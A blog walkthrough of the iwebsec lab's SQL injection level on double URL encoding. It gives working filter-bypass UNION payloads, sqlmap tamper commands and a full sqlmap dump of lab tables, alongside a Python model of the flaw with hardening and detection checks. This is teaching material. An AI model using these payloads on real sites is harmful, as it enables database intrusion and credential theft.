iwebsec range: SQL injection vulnerability walkthrough notes 10 - double URL encoding bypass

news2024/11/27 6:35:31

Series articles

iwebsec range: SQL injection vulnerability walkthrough notes 1 - numeric injection_mooyuan's blog - CSDN blog

iwebsec range: SQL injection vulnerability walkthrough notes 2 - string injection (wide-byte injection)_mooyuan's blog - CSDN blog

iwebsec range: SQL injection vulnerability walkthrough notes 3 - bool injection (boolean-based blind injection)_mooyuan's blog - CSDN blog

iwebsec range: SQL injection vulnerability walkthrough notes 4 - sleep injection (time-based blind injection)_mooyuan's blog - CSDN blog

iwebsec range: SQL injection vulnerability walkthrough notes 5 - updatexml injection (error-based blind injection)_mooyuan's blog - CSDN blog

iwebsec range: SQL injection vulnerability walkthrough notes 6 - wide-byte injection_mooyuan's blog - CSDN blog

iwebsec range: SQL injection vulnerability walkthrough notes 7 - space filter bypass_mooyuan's blog - CSDN blog

iwebsec range: SQL injection vulnerability walkthrough notes 8 - case filter injection_mooyuan's blog - CSDN blog

iwebsec range: SQL injection vulnerability walkthrough notes 9 - double-written keyword bypass_mooyuan's blog - CSDN blog


Contents

Series articles

Preface

1. Source code analysis

2. Double URL encoding

1. So what is double encoding?

2. How this level uses double encoding to get select through

3. How to handle single quotes

(1) Dumping the database name

(2) Dumping table names

(3) Dumping column names

3. sqlmap injection

1. Injection commands

Method 1 (double URL encoding):

Method 2 (hex encoding):

Method 3 (when get_magic_quotes_gpc() is off):

2. Full interaction

Summary



Preface

Open the range; the URL is http://192.168.71.151/sqli/10.php?id=1, as shown below

1. Source code analysis

As shown below, the SQL statement is the same as in the previous levels; the statement executed is $sql="SELECT * FROM user WHERE id=$id LIMIT 0,1"; so this is clearly an ordinary numeric injection, with a select keyword filter on the id parameter and a URL decode applied to id.

The source for the select keyword filter and the URL decode is as follows

  if(isset($_GET['id'])){
      // the keyword check runs on $_GET['id'], which PHP has already URL-decoded once
      if (preg_match('/select/', $_GET["id"])) {
          die("ERROR");
      }else{
          // second URL decode, applied only after the check above has passed
          $id = urldecode($_GET['id']);
          $sql="SELECT * FROM user WHERE id=$id LIMIT 0,1";
          $result=mysql_query($sql);
      }
  }

For comparison with level 08, below is the level 08 source, which only performs the select keyword check

  if(isset($_GET['id'])){
      // level 08: same keyword check, but no second URL decode afterwards
      if (preg_match('/select/', $_GET["id"])) {
          die("ERROR");
      }else{
          $id=$_GET['id'];
          $sql="SELECT * FROM user WHERE id=$id LIMIT 0,1";
          $result=mysql_query($sql);
      }
  }

To emphasize: compared with the select keyword filter of level 08, this level only adds one extra layer of URL decoding. The level is called "double URL decoding" because the incoming parameter has by default already been URL-decoded once, and the newly added statement $id = urldecode($_GET['id']); is the second URL decode. On the surface, the source decodes the input parameter twice in order to stop the keyword filter from being bypassed.

2. Double URL encoding

From the source analysis, it appears that the program guards against a double-encoding bypass.

1. So what is double encoding?

If we pass in a double-URL-encoded string, it slips past the illegal-character check, is then decoded by urldecode, and is carried into the database query for execution, so a SQL injection vulnerability exists.

Newer PHP versions have magic_quotes_gpc enabled by default, so ', ", \ and NUL in all GET, POST and cookie data are specially handled into \', \", \\ and \0, which defends against most string-type SQL injection.

For example:
' (single quote) URL-encoded is %27
%27 URL-encoded again is %2527

If we use double encoding to write the single quote ' as %25%27, then when the server receives the double-encoded parameter %2527 the complete processing flow is

double-encoded %2527 -> first decode gives %27 (because %25 URL-decodes to %), and it passes through the magic_quotes_gpc filter untouched (i.e. the single quote does not become \') -> second decode turns %27 into ' (the single quote), thus bypassing PHP's default filtering mechanism.

2. How this level uses double encoding to get select through

From the source analysis we know the select keyword is filtered, so we can double-URL-encode select.

Since the original filters the complete keyword select, it is enough to URL-encode just the third letter of select, l:

the URL encoding of l is %6c

the URL encoding of %6c is %25%36%63

so select can be replaced by se%25%36%63ect.

Thus, in the injection statement that dumps the database name,

http://192.168.71.151/sqli/10.php?id=1 and 1=2 union select 1,2,database()

replace the keyword select with se%25%36%63ect,

and the statement that injects successfully becomes

http://192.168.71.151/sqli/10.php?id=1 and 1=2 union se%25%36%63ect 1,2,database()

3. How to handle single quotes

When magic_quotes_gpc is off this scenario needs no consideration; in fact the iwebsec range environment does not enable this feature at all, meaning single quotes, double quotes and other special characters are not specially handled. In this level, there is no

Now consider magic_quotes_gpc turned on: the single quote ', double quote ", \ and NUL are all specially handled into \', \", \\ and \0, which defends against most string-type SQL injection. How is that case handled? That is also what the next level, 11, has to deal with.

Manual injection follows (assuming magic_quotes_gpc is on).

Because the iwebsec range environment does not have it enabled, the source of sqli/10.php inside the docker container has to be modified to add this feature by hand.

(1) Dumping the database name

http://192.168.71.151/sqli/10.php?id=1 and 1=2 union se%25%36%63ect 1,2,database()

As the screenshot above shows, the database name obtained is iwebsec

(2) Dumping table names

The following injection command fails, because the database name iwebsec dumped in the previous step is wrapped in single quotes:

http://192.168.71.151/sqli/10.php?id=-1 union se%25%36%63ect 1,2,group_concat(table_name) from information_schema.tables where table_schema='iwebsec'

Method 1: replace 'iwebsec' with database()

http://192.168.71.151/sqli/10.php?id=-1 union se%25%36%63ect 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()

Method 2: replace 'iwebsec' with %2527iwebsec%2527

http://192.168.71.151/sqli/10.php?id=-1 union se%25%36%63ect 1,2,group_concat(table_name) from information_schema.tables where table_schema=%2527iwebsec%2527

Here the iwebsec database has four tables: sqli, user, users and xss

(3) Dumping column names

For example, to obtain the column names of users, the injection command is

http://192.168.71.151/sqli/10.php?id=-1 union se%25%36%63ect 1,2,group_concat(column_name) from information_schema.columns where table_name='users'

But this statement errors out because of the processing done by get_magic_quotes_gpc() and addslashes()

The bypass is to use %2527users%2527 in place of 'users'

http://192.168.71.151/sqli/10.php?id=-1 union se%25%36%63ect 1,2,group_concat(column_name) from information_schema.columns where table_name=%2527users%2527
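The processing chain described in sections 1 to 3 above, modelled in Python as an added example (this is not the lab's own code): PHP's first decode when it builds $_GET, optional magic_quotes_gpc escaping, the select check, and the second urldecode(), next to a numeric-only version of the check, a log check that flags double-encoded parameters, and a helper that reads double-encoded sqlmap PAYLOAD lines like those in the transcript further down. The function names and the sample id values are constructed here, shaped after the URLs on this page.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample values for the id parameter, shaped like the URLs on this page.
BLOCKED = "1 and 1=2 union select 1,2,database()"
DOUBLE_ENCODED = "1 and 1=2 union se%25%36%63ect 1,2,database()"
QUOTED = ("-1 union se%25%36%63ect 1,2,group_concat(table_name) "
          "from information_schema.tables where table_schema='iwebsec'")
QUOTED_DOUBLE = ("-1 union se%25%36%63ect 1,2,group_concat(table_name) "
                 "from information_schema.tables where table_schema=%2527iwebsec%2527")


def addslashes(s: str) -> str:
    """PHP addslashes(): what magic_quotes_gpc applied to GET/POST/cookie values."""
    return (s.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\0", "\\0"))


def level10(raw_value: str, magic_quotes: bool = False):
    """Model of sqli/10.php. PHP decodes the query string once while building $_GET,
    the select check runs on that value, then urldecode() decodes a second time.
    Returns the SQL that would run, or None where die("ERROR") would fire."""
    value = unquote_plus(raw_value)            # first decode: building $_GET['id']
    if magic_quotes:
        value = addslashes(value)              # magic_quotes_gpc, when enabled
    if re.search(r"select", value):            # preg_match('/select/', $_GET["id"])
        return None
    id_ = unquote_plus(value)                  # second decode: urldecode($_GET['id'])
    return f"SELECT * FROM user WHERE id={id_} LIMIT 0,1"


def level10_hardened(raw_value: str):
    """The check the query actually needs: id is numeric, so anything that is not a
    plain integer after the single decode PHP already did is rejected, and the
    value is never decoded a second time."""
    value = unquote_plus(raw_value)
    if not re.fullmatch(r"[0-9]+", value):
        return None
    return f"SELECT * FROM user WHERE id={int(value)} LIMIT 0,1"


def looks_double_encoded(raw_value: str) -> bool:
    """Log or WAF check: a %XX sequence that survives one decode was sent encoded
    twice (e.g. %2527 -> %27), which a browser submitting a form never produces."""
    return re.search(r"%[0-9A-Fa-f]{2}", unquote_plus(raw_value)) is not None


def decode_twice(s: str) -> str:
    """Undo chardoubleencode-style tampering so a logged request can be read."""
    return unquote_plus(unquote_plus(s))


if __name__ == "__main__":
    for name, raw in [("BLOCKED", BLOCKED), ("DOUBLE_ENCODED", DOUBLE_ENCODED)]:
        print(name, "->", level10(raw), "| flagged:", looks_double_encoded(raw))
    print("with magic_quotes:", level10(QUOTED, True))
    print("with magic_quotes:", level10(QUOTED_DOUBLE, True))
```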

3. sqlmap injection

From the above, the bypass methods are summarized as:

(1) use se%25%36%63ect in place of select

(2) use %2527 in place of the single quote

1. Injection commands

Method 1 (double URL encoding):

Use sqlmap's WAF-bypass tamper script --tamper chardoubleencode.py, which double-encodes select, single quotes and everything else; this method fits the level's title exactly (double URL encoding bypass)

sqlmap -u http://192.168.71.151/sqli/10.php?id=1 --current-db --dump --batch --tamper chardoubleencode.py

Method 2 (hex encoding):

Referring to level 11, hex character encoding can also be used to bypass the filter

sqlmap -u http://192.168.71.151/sqli/10.php?id=1 --current-db --dump --batch --tamper hex2char.py

Method 3 (when get_magic_quotes_gpc() is off):

To emphasize: since the iwebsec range environment does not enable get_magic_quotes_gpc(), there is no need to worry about single quotes and similar characters being escaped; only the select keyword filter matters, so without changing any code the methods from levels 08 and 09 also succeed

sqlmap -u http://192.168.71.151/sqli/10.php?id=1 --current-db --dump --batch --tamper double_ljn09.py
sqlmap -u http://192.168.71.151/sqli/10.php?id=1 --current-db --dump --batch --tamper randomcase.py

2. Full interaction

To show the effect of chardoubleencode.py in full, the complete -v 3 interaction is attached; the output shows that every string was double URL-encoded, as follows

kali@kali:/usr/share/sqlmap/tamper$ sqlmap -u http://192.168.71.151/sqli/10.php?id=1  --current-db --dump --batch --tamper chardoubleencode.py -v 3
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.5.11#stable}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:36:13 /2022-11-25/

[02:36:13] [DEBUG] cleaning up configuration parameters
[02:36:13] [INFO] loading tamper module 'chardoubleencode'
[02:36:13] [DEBUG] setting the HTTP timeout
[02:36:13] [DEBUG] setting the HTTP User-Agent header
[02:36:13] [DEBUG] creating HTTP requests opener object
[02:36:13] [INFO] resuming back-end DBMS 'mysql' 
[02:36:13] [INFO] testing connection to the target URL
[02:36:13] [DEBUG] declared web page charset 'utf-8'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (8669=8669) THEN 1 ELSE (SELECT 1609 UNION SELECT 1652) END))
    Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 2671 FROM(SELECT COUNT(*),CONCAT(0x7178716271,(SELECT (ELT(2671=2671,1))),0x7162627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 3194 FROM (SELECT(SLEEP(5)))NdTE)
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7178716271,0x737763636a6d4b595172494d63426767587648716c634d4558445341545941656d62644f46726646,0x7162627171)-- -
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY]-- -
---
[02:36:13] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[02:36:13] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6
web application technology: PHP 5.2.17, Apache 2.2.15
back-end DBMS: MySQL >= 5.0
[02:36:13] [INFO] fetching current database
[02:36:13] [DEBUG] resuming configuration option 'string' ('age')
[02:36:13] [DEBUG] performed 0 queries in 0.00 seconds
current database: 'iwebsec'
[02:36:13] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[02:36:13] [INFO] fetching current database
[02:36:13] [INFO] fetching tables for database: 'iwebsec'
[02:36:13] [PAYLOAD] %2531%2520%2555%254E%2549%254F%254E%2520%2541%254C%254C%2520%2553%2545%254C%2545%2543%2554%2520%254E%2555%254C%254C%252C%254E%2555%254C%254C%252C%2543%254F%254E%2543%2541%2554%2528%2530%2578%2537%2531%2537%2538%2537%2531%2536%2532%2537%2531%252C%254A%2553%254F%254E%255F%2541%2552%2552%2541%2559%2541%2547%2547%2528%2543%254F%254E%2543%2541%2554%255F%2557%2553%2528%2530%2578%2537%2539%2536%2564%2536%2531%2536%2563%2536%2535%2537%2533%252C%2574%2561%2562%256C%2565%255F%256E%2561%256D%2565%2529%2529%252C%2530%2578%2537%2531%2536%2532%2536%2532%2537%2531%2537%2531%2529%2520%2546%2552%254F%254D%2520%2549%254E%2546%254F%2552%254D%2541%2554%2549%254F%254E%255F%2553%2543%2548%2545%254D%2541%252E%2554%2541%2542%254C%2545%2553%2520%2557%2548%2545%2552%2545%2520%2574%2561%2562%256C%2565%255F%2573%2563%2568%2565%256D%2561%2520%2549%254E%2520%2528%2530%2578%2536%2539%2537%2537%2536%2535%2536%2532%2537%2533%2536%2535%2536%2533%2529%252D%252D%2520%252D
[02:36:13] [DEBUG] performed 1 query in 0.07 seconds
[02:36:13] [INFO] fetching columns for table 'sqli' in database 'iwebsec'
[02:36:13] [PAYLOAD] %2531%2520%2555%254E%2549%254F%254E%2520%2541%254C%254C%2520%2553%2545%254C%2545%2543%2554%2520%254E%2555%254C%254C%252C%254E%2555%254C%254C%252C%2543%254F%254E%2543%2541%2554%2528%2530%2578%2537%2531%2537%2538%2537%2531%2536%2532%2537%2531%252C%254A%2553%254F%254E%255F%2541%2552%2552%2541%2559%2541%2547%2547%2528%2543%254F%254E%2543%2541%2554%255F%2557%2553%2528%2530%2578%2537%2539%2536%2564%2536%2531%2536%2563%2536%2535%2537%2533%252C%2563%256F%256C%2575%256D%256E%255F%256E%2561%256D%2565%252C%2563%256F%256C%2575%256D%256E%255F%2574%2579%2570%2565%2529%2529%252C%2530%2578%2537%2531%2536%2532%2536%2532%2537%2531%2537%2531%2529%2520%2546%2552%254F%254D%2520%2549%254E%2546%254F%2552%254D%2541%2554%2549%254F%254E%255F%2553%2543%2548%2545%254D%2541%252E%2543%254F%254C%2555%254D%254E%2553%2520%2557%2548%2545%2552%2545%2520%2574%2561%2562%256C%2565%255F%256E%2561%256D%2565%253D%2530%2578%2537%2533%2537%2531%2536%2563%2536%2539%2520%2541%254E%2544%2520%2574%2561%2562%256C%2565%255F%2573%2563%2568%2565%256D%2561%253D%2530%2578%2536%2539%2537%2537%2536%2535%2536%2532%2537%2533%2536%2535%2536%2533%252D%252D%2520%252D
[02:36:13] [DEBUG] performed 1 query in 0.06 seconds
[02:36:13] [INFO] fetching entries for table 'sqli' in database 'iwebsec'
[02:36:13] [DEBUG] stripping ORDER BY clause from statement because it does not play well with UNION query SQL injection
[02:36:13] [PAYLOAD] %2531%2520%2555%254E%2549%254F%254E%2520%2541%254C%254C%2520%2553%2545%254C%2545%2543%2554%2520%254E%2555%254C%254C%252C%254E%2555%254C%254C%252C%2543%254F%254E%2543%2541%2554%2528%2530%2578%2537%2531%2537%2538%2537%2531%2536%2532%2537%2531%252C%254A%2553%254F%254E%255F%2541%2552%2552%2541%2559%2541%2547%2547%2528%2543%254F%254E%2543%2541%2554%255F%2557%2553%2528%2530%2578%2537%2539%2536%2564%2536%2531%2536%2563%2536%2535%2537%2533%252C%2565%256D%2561%2569%256C%252C%2569%2564%252C%2570%2561%2573%2573%2577%256F%2572%2564%252C%2575%2573%2565%2572%256E%2561%256D%2565%2529%2529%252C%2530%2578%2537%2531%2536%2532%2536%2532%2537%2531%2537%2531%2529%2520%2546%2552%254F%254D%2520%2569%2577%2565%2562%2573%2565%2563%252E%2573%2571%256C%2569%252D%252D%2520%252D
[02:36:13] [DEBUG] performed 1 query in 0.05 seconds
[02:36:13] [DEBUG] analyzing table dump for possible password hashes
Database: iwebsec
Table: sqli
[7 entries]
+----+-----------------------+----------+------------------------------------------------------+
| id | email                 | password | username                                             |
+----+-----------------------+----------+------------------------------------------------------+
| 1  | user1@iwebsec.com     | pass1    | user1                                                |
| 2  | user2@iwebsec.com     | pass2    | user2                                                |
| 3  | user3@iwebsec.com     | pass3    | user3                                                |
| 4  | user4@iwebsec.com     | admin    | admin                                                |
| 5  | 123@123.com           | 123      | 123                                                  |
| 6  | 1234@123.com          | 123      | ctfs' or updatexml(1,concat(0x7e,(version())),0)#    |
| 7  | iwebsec02@iwebsec.com | 123456   | iwebsec' or updatexml(1,concat(0x7e,(version())),0)# |
+----+-----------------------+----------+------------------------------------------------------+

[02:36:13] [INFO] table 'iwebsec.sqli' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/sqli.csv'
[02:36:13] [INFO] fetching columns for table 'user' in database 'iwebsec'
[02:36:13] [PAYLOAD] %2531%2520%2555%254E%2549%254F%254E%2520%2541%254C%254C%2520%2553%2545%254C%2545%2543%2554%2520%254E%2555%254C%254C%252C%254E%2555%254C%254C%252C%2543%254F%254E%2543%2541%2554%2528%2530%2578%2537%2531%2537%2538%2537%2531%2536%2532%2537%2531%252C%254A%2553%254F%254E%255F%2541%2552%2552%2541%2559%2541%2547%2547%2528%2543%254F%254E%2543%2541%2554%255F%2557%2553%2528%2530%2578%2537%2539%2536%2564%2536%2531%2536%2563%2536%2535%2537%2533%252C%2563%256F%256C%2575%256D%256E%255F%256E%2561%256D%2565%252C%2563%256F%256C%2575%256D%256E%255F%2574%2579%2570%2565%2529%2529%252C%2530%2578%2537%2531%2536%2532%2536%2532%2537%2531%2537%2531%2529%2520%2546%2552%254F%254D%2520%2549%254E%2546%254F%2552%254D%2541%2554%2549%254F%254E%255F%2553%2543%2548%2545%254D%2541%252E%2543%254F%254C%2555%254D%254E%2553%2520%2557%2548%2545%2552%2545%2520%2574%2561%2562%256C%2565%255F%256E%2561%256D%2565%253D%2530%2578%2537%2535%2537%2533%2536%2535%2537%2532%2520%2541%254E%2544%2520%2574%2561%2562%256C%2565%255F%2573%2563%2568%2565%256D%2561%253D%2530%2578%2536%2539%2537%2537%2536%2535%2536%2532%2537%2533%2536%2535%2536%2533%252D%252D%2520%252D
[02:36:13] [DEBUG] performed 1 query in 0.06 seconds
[02:36:13] [INFO] fetching entries for table 'user' in database 'iwebsec'
[02:36:13] [PAYLOAD] %2531%2520%2555%254E%2549%254F%254E%2520%2541%254C%254C%2520%2553%2545%254C%2545%2543%2554%2520%254E%2555%254C%254C%252C%254E%2555%254C%254C%252C%2543%254F%254E%2543%2541%2554%2528%2530%2578%2537%2531%2537%2538%2537%2531%2536%2532%2537%2531%252C%254A%2553%254F%254E%255F%2541%2552%2552%2541%2559%2541%2547%2547%2528%2543%254F%254E%2543%2541%2554%255F%2557%2553%2528%2530%2578%2537%2539%2536%2564%2536%2531%2536%2563%2536%2535%2537%2533%252C%2569%2564%252C%2570%2561%2573%2573%2577%256F%2572%2564%252C%2575%2573%2565%2572%256E%2561%256D%2565%2529%2529%252C%2530%2578%2537%2531%2536%2532%2536%2532%2537%2531%2537%2531%2529%2520%2546%2552%254F%254D%2520%2569%2577%2565%2562%2573%2565%2563%252E%2560%2575%2573%2565%2572%2560%252D%252D%2520%252D
[02:36:13] [DEBUG] performed 1 query in 0.05 seconds
[02:36:13] [DEBUG] analyzing table dump for possible password hashes
Database: iwebsec
Table: user
[3 entries]
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1  | pass1    | user1    |
| 2  | pass2    | user2    |
| 3  | pass3    | user3    |
+----+----------+----------+

[02:36:13] [INFO] table 'iwebsec.`user`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/user.csv'
[02:36:13] [INFO] fetching columns for table 'xss' in database 'iwebsec'
[02:36:13] [PAYLOAD] %2531%2520%2555%254E%2549%254F%254E%2520%2541%254C%254C%2520%2553%2545%254C%2545%2543%2554%2520%254E%2555%254C%254C%252C%254E%2555%254C%254C%252C%2543%254F%254E%2543%2541%2554%2528%2530%2578%2537%2531%2537%2538%2537%2531%2536%2532%2537%2531%252C%254A%2553%254F%254E%255F%2541%2552%2552%2541%2559%2541%2547%2547%2528%2543%254F%254E%2543%2541%2554%255F%2557%2553%2528%2530%2578%2537%2539%2536%2564%2536%2531%2536%2563%2536%2535%2537%2533%252C%2563%256F%256C%2575%256D%256E%255F%256E%2561%256D%2565%252C%2563%256F%256C%2575%256D%256E%255F%2574%2579%2570%2565%2529%2529%252C%2530%2578%2537%2531%2536%2532%2536%2532%2537%2531%2537%2531%2529%2520%2546%2552%254F%254D%2520%2549%254E%2546%254F%2552%254D%2541%2554%2549%254F%254E%255F%2553%2543%2548%2545%254D%2541%252E%2543%254F%254C%2555%254D%254E%2553%2520%2557%2548%2545%2552%2545%2520%2574%2561%2562%256C%2565%255F%256E%2561%256D%2565%253D%2530%2578%2537%2538%2537%2533%2537%2533%2520%2541%254E%2544%2520%2574%2561%2562%256C%2565%255F%2573%2563%2568%2565%256D%2561%253D%2530%2578%2536%2539%2537%2537%2536%2535%2536%2532%2537%2533%2536%2535%2536%2533%252D%252D%2520%252D
[02:36:13] [DEBUG] performed 1 query in 0.06 seconds
[02:36:13] [INFO] fetching entries for table 'xss' in database 'iwebsec'
[02:36:13] [PAYLOAD] %2531%2520%2555%254E%2549%254F%254E%2520%2541%254C%254C%2520%2553%2545%254C%2545%2543%2554%2520%254E%2555%254C%254C%252C%254E%2555%254C%254C%252C%2543%254F%254E%2543%2541%2554%2528%2530%2578%2537%2531%2537%2538%2537%2531%2536%2532%2537%2531%252C%254A%2553%254F%254E%255F%2541%2552%2552%2541%2559%2541%2547%2547%2528%2543%254F%254E%2543%2541%2554%255F%2557%2553%2528%2530%2578%2537%2539%2536%2564%2536%2531%2536%2563%2536%2535%2537%2533%252C%2569%2564%252C%256E%2561%256D%2565%2529%2529%252C%2530%2578%2537%2531%2536%2532%2536%2532%2537%2531%2537%2531%2529%2520%2546%2552%254F%254D%2520%2569%2577%2565%2562%2573%2565%2563%252E%2578%2573%2573%252D%252D%2520%252D
[02:36:13] [DEBUG] turning off reflection removal mechanism (for optimization purposes)
[02:36:13] [DEBUG] performed 1 query in 0.06 seconds
[02:36:13] [DEBUG] analyzing table dump for possible password hashes
Database: iwebsec
Table: xss
[5 entries]
+----+------------------------------------+
| id | name                               |
+----+------------------------------------+
| 7  | <img src=1 onerror=alert(/ctfs/)/> |
| 6  | <img src=1 onerror=alert(/ctfs/)/> |
| 5  | <img src=1 onerror=alert(/ctfs/)/> |
| 1  | iwebsec                            |
| 8  | <?php phpinfo();?>                 |
+----+------------------------------------+

[02:36:13] [INFO] table 'iwebsec.xss' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/xss.csv'
[02:36:13] [INFO] fetching columns for table 'users' in database 'iwebsec'
[02:36:13] [PAYLOAD] %2531%2520%2555%254E%2549%254F%254E%2520%2541%254C%254C%2520%2553%2545%254C%2545%2543%2554%2520%254E%2555%254C%254C%252C%254E%2555%254C%254C%252C%2543%254F%254E%2543%2541%2554%2528%2530%2578%2537%2531%2537%2538%2537%2531%2536%2532%2537%2531%252C%254A%2553%254F%254E%255F%2541%2552%2552%2541%2559%2541%2547%2547%2528%2543%254F%254E%2543%2541%2554%255F%2557%2553%2528%2530%2578%2537%2539%2536%2564%2536%2531%2536%2563%2536%2535%2537%2533%252C%2563%256F%256C%2575%256D%256E%255F%256E%2561%256D%2565%252C%2563%256F%256C%2575%256D%256E%255F%2574%2579%2570%2565%2529%2529%252C%2530%2578%2537%2531%2536%2532%2536%2532%2537%2531%2537%2531%2529%2520%2546%2552%254F%254D%2520%2549%254E%2546%254F%2552%254D%2541%2554%2549%254F%254E%255F%2553%2543%2548%2545%254D%2541%252E%2543%254F%254C%2555%254D%254E%2553%2520%2557%2548%2545%2552%2545%2520%2574%2561%2562%256C%2565%255F%256E%2561%256D%2565%253D%2530%2578%2537%2535%2537%2533%2536%2535%2537%2532%2537%2533%2520%2541%254E%2544%2520%2574%2561%2562%256C%2565%255F%2573%2563%2568%2565%256D%2561%253D%2530%2578%2536%2539%2537%2537%2536%2535%2536%2532%2537%2533%2536%2535%2536%2533%252D%252D%2520%252D
[02:36:13] [DEBUG] performed 1 query in 0.06 seconds
[02:36:13] [INFO] fetching entries for table 'users' in database 'iwebsec'
[02:36:13] [PAYLOAD] %2531%2520%2555%254E%2549%254F%254E%2520%2541%254C%254C%2520%2553%2545%254C%2545%2543%2554%2520%254E%2555%254C%254C%252C%254E%2555%254C%254C%252C%2543%254F%254E%2543%2541%2554%2528%2530%2578%2537%2531%2537%2538%2537%2531%2536%2532%2537%2531%252C%254A%2553%254F%254E%255F%2541%2552%2552%2541%2559%2541%2547%2547%2528%2543%254F%254E%2543%2541%2554%255F%2557%2553%2528%2530%2578%2537%2539%2536%2564%2536%2531%2536%2563%2536%2535%2537%2533%252C%2570%2561%2573%2573%2577%256F%2572%2564%252C%2572%256F%256C%2565%252C%2575%2573%2565%2572%256E%2561%256D%2565%2529%2529%252C%2530%2578%2537%2531%2536%2532%2536%2532%2537%2531%2537%2531%2529%2520%2546%2552%254F%254D%2520%2569%2577%2565%2562%2573%2565%2563%252E%2575%2573%2565%2572%2573%252D%252D%2520%252D
[02:36:13] [DEBUG] performed 1 query in 0.01 seconds
[02:36:13] [DEBUG] analyzing table dump for possible password hashes
Database: iwebsec
Table: users
[1 entry]
+-------+-------------+----------+
| role  | password    | username |
+-------+-------------+----------+
| admin | mall123mall | orange   |
+-------+-------------+----------+

[02:36:13] [INFO] table 'iwebsec.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/users.csv'
[02:36:13] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.71.151'
[02:36:13] [WARNING] your sqlmap version is outdated

[*] ending @ 02:36:13 /2022-11-25/

Summary

SQL injection analysis mainly covers a few points

(1) What is the closing style? iwebsec level 10 is numeric, with no closing quote

(2) What is the injection type? This one is ordinary error-based injection

(3) Are keywords filtered? From the source it is clear that iwebsec level 10 filters the select keyword and performs double URL decoding

With this information, SQL penetration can be done in a targeted way, and the sqlmap tool makes it even more efficient; that is today's content on double-URL-decoding injection. Beginners are advised to practise manual injection step by step first and only then move on to sqlmap.
